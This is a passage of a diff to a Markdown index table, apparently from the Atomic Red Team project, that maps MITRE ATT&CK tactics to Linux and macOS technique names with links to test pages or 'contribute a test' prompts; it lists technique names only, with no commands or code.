-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Unix Shell](../../T1059.004/T1059.004.md) | [Cron](../../T1053.003/T1053.003.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
-| | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [File Deletion](../../T1070.004/T1070.004.md) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Service](../../T1543.002/T1543.002.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1546.005/T1546.005.md) | [HISTCONTROL](../../T1562.003/T1562.003.md) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | [Screen Capture](../../T1113/T1113.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-| | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | [Local Account](../../T1136.001/T1136.001.md) | | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Non-Standard Port](../../T1571/T1571.md) | |
-| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Indicator Blocking](../../T1562.006/T1562.006.md) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
-| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
-| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Systemd Service](../../T1543.002/T1543.002.md) | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
-| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Trap](../../T1546.005/T1546.005.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
